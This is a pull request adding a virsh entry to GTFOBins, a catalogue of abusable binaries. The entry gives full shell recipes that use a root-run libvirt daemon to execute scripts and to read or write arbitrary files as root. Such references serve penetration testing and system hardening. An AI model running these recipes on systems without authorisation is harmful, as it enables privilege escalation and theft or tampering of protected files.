### PR TITLE
Add virsh

### DIFF
--- a/_gtfobins/virsh.md
+++ b/_gtfobins/virsh.md
@@ -1,0 +1,44 @@
+---
+description: |
+  This requires the user to be privileged enough to connect to the libvirt daemon, i.e. being in the `libvirt` group.
+
+functions:
+  command:
+    - description: Execute a script stored on the libvirt server creating a VM using a `<script>` tag on the network interface definition.
+      code: |
+        SCRIPT=script_to_run
+        TF=$(mktemp)
+        cat > $TF << EOF
+        <domain type='kvm'>
+          <name>foo</name>
+          <os>
+            <type arch='x86_64'>hvm</type>
+          </os>
+          <memory unit='KiB'>1</memory>
+          <devices>
+            <interface type='ethernet'>
+              <script path='$SCRIPT'/>
+            </interface>
+          </devices>
+        </domain>
+        EOF
+        virsh create $TF
+        virsh destroy foo
+  file-write:
+    - description: Write a file by creating a storage pool on the target directory and uploading the file as a volume. If the target directory doesn't exist `pool-create-as` must be run with the `--build` option. Directories are created with permissions 711, and files with permissions 600. These can be modified using `pool-create|vol-create` with an XML definition file instead of using `pool-create-as|vol-create-as`. Sample XML files can be obtained with `pool-dumpxml|vol-dumpxml`.
+      code: |
+        LPATH=file_to_read
+        RPATH=file_to_save
+        virsh pool-create-as $(dirname $RPATH|tr / _) dir --target $(dirname $RPATH)
+        virsh vol-create-as $(dirname $RPATH|tr / _) $(basename $RPATH) 0
+        virsh vol-upload $RPATH $LPATH
+        virsh pool-destroy $(dirname $RPATH|tr / _)
+  file-read:
+    - description: Read a file by creating a storage pool on the target directory and downloading the file as a volume.
+      code: |
+        RPATH=file_to_get
+        LPATH=file_to_save
+        virsh pool-create-as $(dirname $RPATH|tr / _) dir --target $(dirname $RPATH)
+        virsh vol-download $RPATH $LPATH
+        virsh pool-destroy $(dirname $RPATH|tr / _)
+---

--- a/_gtfobins/virsh.md
+++ b/_gtfobins/virsh.md
@@ -1,6 +1,6 @@
 ---
 description: |
-  This requires the user to be privileged enough to connect to the libvirt daemon, i.e. being in the `libvirt` group.
+  This requires the user to be privileged enough to connect to the libvirt daemon, i.e. being in the `libvirt` group or be able to run `virsh` as sudo.
 
 functions:
   command:
@@ -22,23 +22,23 @@ functions:
           </devices>
         </domain>
         EOF
-        virsh create $TF
-        virsh destroy foo
+        virsh -c qemu:///system create $TF
+        virsh -c qemu:///system destroy foo
   file-write:
     - description: Write a file by creating a storage pool on the target directory and uploading the file as a volume. If the target directory doesn't exist `pool-create-as` must be run with the `--build` option. Directories are created with permissions 711, and files with permissions 600. These can be modified using `pool-create|vol-create` with an XML definition file instead of using `pool-create-as|vol-create-as`. Sample XML files can be obtained with `pool-dumpxml|vol-dumpxml`.
       code: |
         LPATH=file_to_read
         RPATH=file_to_save
-        virsh pool-create-as $(dirname $RPATH|tr / _) dir --target $(dirname $RPATH)
-        virsh vol-create-as $(dirname $RPATH|tr / _) $(basename $RPATH) 0
-        virsh vol-upload $RPATH $LPATH
-        virsh pool-destroy $(dirname $RPATH|tr / _)
+        virsh -c qemu:///system pool-create-as $(dirname $RPATH|tr / _) dir --target $(dirname $RPATH)
+        virsh -c qemu:///system vol-create-as $(dirname $RPATH|tr / _) $(basename $RPATH) 0
+        virsh -c qemu:///system vol-upload $RPATH $LPATH
+        virsh -c qemu:///system pool-destroy $(dirname $RPATH|tr / _)
   file-read:
     - description: Read a file by creating a storage pool on the target directory and downloading the file as a volume.
       code: |
         RPATH=file_to_get
         LPATH=file_to_save
-        virsh pool-create-as $(dirname $RPATH|tr / _) dir --target $(dirname $RPATH)
-        virsh vol-download $RPATH $LPATH
-        virsh pool-destroy $(dirname $RPATH|tr / _)
+        virsh -c qemu:///system pool-create-as $(dirname $RPATH|tr / _) dir --target $(dirname $RPATH)
+        virsh -c qemu:///system vol-download $RPATH $LPATH
+        virsh -c qemu:///system pool-destroy $(dirname $RPATH|tr / _)
 ---


### PR DESCRIPTION
Add virsh. An unprivileged user on the libvirt group can use it to connect to a local or remote libvirt daemon, which usually runs as root. It can then be used to perform file operations and run scripts as the root user.